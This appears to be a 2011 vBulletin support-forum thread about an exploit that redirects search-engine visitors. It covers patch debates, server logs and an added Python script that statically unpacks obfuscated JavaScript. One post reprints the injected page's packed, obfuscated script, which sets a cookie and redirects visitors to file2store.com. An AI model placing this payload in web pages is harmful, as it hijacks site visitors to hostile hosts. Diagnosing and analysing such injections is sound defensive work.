vBulletin 3.x and 4.x Redirect Security Exploit

This topic is closed.

  • Steve Machol
    replied
    Originally posted by djbaxter
    Well, I have no intention of moving to XenForo but I have to agree that particular response from Steve seemed rather belligerent and unhelpful.
    This was 'belligerent'?

    Originally posted by Steve Machol
    Please start your own thread with all the relevant details. Thank you.
    For the record we have always asked people to start their own thread with their specific issue. That way we can concentrate on their problem and not have it diluted by a bunch of other people using the same thread for issues that may or may not be identical.

    Sorry if that offended anyone, but this is nothing new.



  • Steve Machol
    replied
    Originally posted by Bacon Butty
    I have;

    http://www.vbulletin.com/forum/showthread.php/380956-Yahoo-YUI-Security-Exploit-Patch-Not-Working

    And with respect, that type of response pretty much epitomises the piss poor response by vBulletin towards what should be an urgent matter.

    Another instance which makes it beyond any doubt that my forum's future lies with XenForo.
    Sorry you feel that way but it is easier to solve issues when people start their own threads rather than hijacking someone else's thread. We have been asking people to do this for 10 years now, even when the old Devs were in charge.



  • djbaxter
    replied
    Originally posted by Bacon Butty
    I have;

    http://www.vbulletin.com/forum/showthread.php/380956-Yahoo-YUI-Security-Exploit-Patch-Not-Working

    And with respect, that type of response pretty much epitomises the piss poor response by vBulletin towards what should be an urgent matter.

    Another instance which makes it beyond any doubt that my forum's future lies with XenForo.
    Well, I have no intention of moving to XenForo but I have to agree that particular response from Steve seemed rather belligerent and unhelpful.



  • Bacon Butty
    replied
    Originally posted by Steve Machol
    Please start your own thread with all the relevant details. Thank you.
    I have;

    http://www.vbulletin.com/forum/showthread.php/380956-Yahoo-YUI-Security-Exploit-Patch-Not-Working

    And with respect, that type of response pretty much epitomises the piss poor response by vBulletin towards what should be an urgent matter.

    Another instance which makes it beyond any doubt that my forum's future lies with XenForo.



  • Joep11
    replied
    The redirect is back and the errors have stopped! Why?

    The last error was at 17:12:22

    From access log:

    77.245.91.19 - - [03/Jun/2011:17:12:16 +0200] "GET /18905-fiat-presenteert-ruim-aangeklede-fiat-500-twinair.html HTTP/1.0" 200 10354 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible; Heritrix ; +http://www.buzzcapture.com)"
    66.249.72.100 - - [03/Jun/2011:17:12:16 +0200] "GET /volvo/ HTTP/1.1" 200 18828 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    77.245.91.19 - - [03/Jun/2011:17:12:19 +0200] "GET /18939-vanafprijs-chevrolet-aveo.html HTTP/1.0" 200 10246 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible; Heritrix ; +http://www.buzzcapture.com)"
    77.245.91.19 - - [03/Jun/2011:17:12:22 +0200] "GET /18973-audi-prijst-q3.html HTTP/1.0" 200 10258 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible; Heritrix ; +http://www.buzzcapture.com)"
    93.125.201.157 - - [03/Jun/2011:17:12:25 +0200] "POST /register.php?do=checkdate HTTP/1.1" 200 5513 "http://www.nationaalautoforum.nl/register.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
    77.245.91.19 - - [03/Jun/2011:17:12:25 +0200] "GET /18916-nissan-leaf-veiligste-ev-ooit-met-5-ncap-sterren.html HTTP/1.0" 200 10380 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible; Heritrix ; +http://www.buzzcapture.com)"
    77.245.91.19 - - [03/Jun/2011:17:12:29 +0200] "GET /18917-belastingvoordeel-zuinige-auto-s-verdwijnt.html HTTP/1.0" 200 11546 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible; Heritrix ; +http://www.buzzcapture.com)"

    There is nothing strange to see...?



  • djbaxter
    replied
    That's just a PHP warning but what's interesting is it implicates class_bbcode.php - the first time I've seen that specifically.



  • Joep11
    replied
    I also noticed the following...

    In the error logs it shows:

    [Fri Jun 03 16:52:11 2011] [error] [client 77.245.91.19] PHP Warning: Call-time
    pass-by-reference has been deprecated - argument passed by value; If you would
    like to pass it by reference, modify the declaration of [runtime function
    name](). If you would like to enable call-time pass-by-reference, you can set
    allow_call_time_pass_reference to true in your INI file. However, future
    versions may not support this any longer. in
    /var/www/vhosts/nationaalautoforum.nl/httpdocs/includes/class_bbcode.php(172) :
    eval()'d code on line 7, referer: http://www.nationaalautoforum.nl/mijn-auto/

    many times. It started showing when the redirect stopped working.

    Anybody?



  • Joep11
    replied
    One of our sites was hit by the redirect from google.

    In Google results page I right-clicked on our link and chose 'save link', so I saved our page without visiting it. I opened the page in notebook and this is what I got:

    <html><head></head><body><script type=
    "text/javascript">var vbsp='CA433C43';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o a=["\\A\\c\\e\\l\\d\\y\\c","\\k\\c\\e\\l\\d\\y\\c","\\B\\x\\c\\L\\f\\d\\q\\c\\k\\h","\\e\\b\\ M\\N\\l\\O\\e\\q\\d\\j\\A","\\w\\b\\b\\J\\d\\c","\\h","\\B\\x\\f\\r\\e\\n\\h\\i","\\G\\H\\ k\\f","\\I","\\p\\b\\w\\r\\e\\d\\b\\j","\\n\\e\\e\\f\\Q\\i\\i\\D\\d\\p\\c\\P\\k\\e\\b\\q\\ c\\C\\d\\j\\D\\b\\i\\m\\b\\S\\j\\p\\b\\r\\m\\C\\f\\n\\f\\T\\d\\m\\h"];E z(u,t){o g=F K();g[a[1]](g[a[0]]()+R);o s=a[2]+g[a[3]]();v[a[4]]=u+a[5]+t+s+a[6]};z(a[7],a[8]);v[a[9]]=a[V]+U;',58,58,'||||||||||_0x95ee|x6F|x65|x69|x74|x70|_0x601cx4|x3D|x2F|x6E|x73|x54|x64|x68|va r|x6C|x72|x61|_0x601cx5|_0x601cx3|_0x601cx2|document|x63|x20|x6D|ipbcc|x67|x3B|x2E|x66|fun ction|new|x76|x62|x31|x6B|Date|x78|x47|x4D|x53|x32|x3A|86400000|x77|x3F|vbsp|10'.split('|' ),0,{}))</script></body></html>
    When I open the page with this code in IE it goes to file2store.com.

    I can't find this code in my templates. Is it of any use defining where it comes from?



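The saved page in the post above is wrapped in the common "p,a,c,k,e,d" JavaScript packer. As an added example (not part of the thread and not vBulletin code), this Python code reverses that packing statically, without executing the script, and reports the traits of the saved page: a packed script, no visible content, and an assignment to `location`. The sample page, the `example.invalid` host and the function names are constructed for illustration.

```python
import re

# Call shape of the packer: }('payload',radix,count,'k0|k1|...'.split('|'),0,{})
PACKED = re.compile(
    r"eval\(function\(p,a,c,k,e,d\).*?\}\s*\(\s*'(.*)',\s*(\d+),\s*(\d+),\s*'(.*?)'"
    r"\s*\.split\(\s*'\|'\s*\)", re.S)
DIGITS = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

# Constructed, inert sample in the same shape as the saved page (not the thread's payload).
SAMPLE = r"""<html><head></head><body><script type="text/javascript">
eval(function(p,a,c,k,e,d){return p}('0 1="\\2\\2\\2";3.4="5://"+1+".6.7/";',62,8,
'var|h|x77|document|location|https|example|invalid'.split('|'),0,{}))</script></body></html>"""

def unpack(html):
    """Statically undo the packer's word substitution; the script is never executed."""
    m = PACKED.search(html)
    if not m:
        return None
    payload, radix, words = m.group(1), int(m.group(2)), m.group(4).split("|")

    def lookup(tok):
        index = 0
        for ch in tok.group(0):
            digit = DIGITS.find(ch)
            if digit < 0 or digit >= radix:
                return tok.group(0)      # not a packer token, keep it unchanged
            index = index * radix + digit
        # An empty keyword means the token stands for itself.
        return words[index] if index < len(words) and words[index] else tok.group(0)

    code = re.sub(r"\b\w+\b", lookup, payload)
    # Second layer seen in the post: string contents written as \xNN escapes.
    return re.sub(r"\\+x([0-9a-fA-F]{2})", lambda h: chr(int(h.group(1), 16)), code)

def inspect(html):
    """Report the traits of the saved page: packed script and no visible content."""
    visible = re.sub(r"<script\b.*?</script>|<[^>]+>", "", html, flags=re.S | re.I).strip()
    code = unpack(html)
    return {"packed": code is not None, "script_only": not visible, "unpacked": code,
            "assigns_location": bool(code and re.search(r"\blocation\b\s*=", code))}
```

Run `inspect()` on copies of a page saved with and without a search-engine referer; a copy that comes back packed and script-only while the other shows normal forum markup points to a referer-conditional injection.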
  • Steve Machol
    replied
    Originally posted by Bacon Butty
    Which logs mate?

    Having a nightmare with this!

    Any idiot guides out there? - The 'fix' from vB resolved it for a day.
    Please start your own thread with all the relevant details. Thank you.



  • Bacon Butty
    replied
    Originally posted by briansol
    check your logs. no one really knows and any log data you have may help find the leak.
    Which logs mate?

    Having a nightmare with this!

    Any idiot guides out there? - The 'fix' from vB resolved it for a day.



  • Paul M
    replied
    Originally posted by Ramsesx
    I don't get why there is a security patch, so far as it is known, there are only two yui files affected, one isn't in vB3.x and the other one was patched already. An explanation would be appreciated.
    Caution I guess, but it seems to me it's probably going to cause more issues than it's worth.

    Btw, afaik, neither affected file exists in 3.x. The only way a 3.x forum would have had access to them is if they were using the remote hosted option, but Yahoo patched them ages ago.



  • BirdOPrey5
    replied
    Originally posted by Marvin Hlavac
    For those of us who are not as technically skilful as Brian, is a vBulletin (3.8.x and 4.x) with the current YUI in the works?
    Originally posted by Steve Machol
    Yes, 4.1.4.
    I believe the logically correct answer is NO, unless there is another 3.8 patch in the works?



  • Steve Machol
    replied
    Originally posted by Marvin Hlavac
    For those of us who are not as technically skilful as Brian, is a vBulletin (3.8.x and 4.x) with the current YUI in the works?
    Yes, 4.1.4.



  • Marvin Hlavac
    replied
    Originally posted by Marvin
    does the 3.8.7 PL1 include the latest YUI, or it doesn't?

    Originally posted by Zachery
    Right now, I don't believe it does

    Originally posted by Brian
    Thanks for the confirmation of a half-patch.
    Patching on my own, again...
    For those of us who are not as technically skilful as Brian, is a vBulletin (3.8.x and 4.x) with the current YUI in the works?



  • PixelGal
    replied
    It looks like there has been a 4-1-3_Patch_Level_1 patch released since I last upgraded. Has anyone been hit after installing that one?

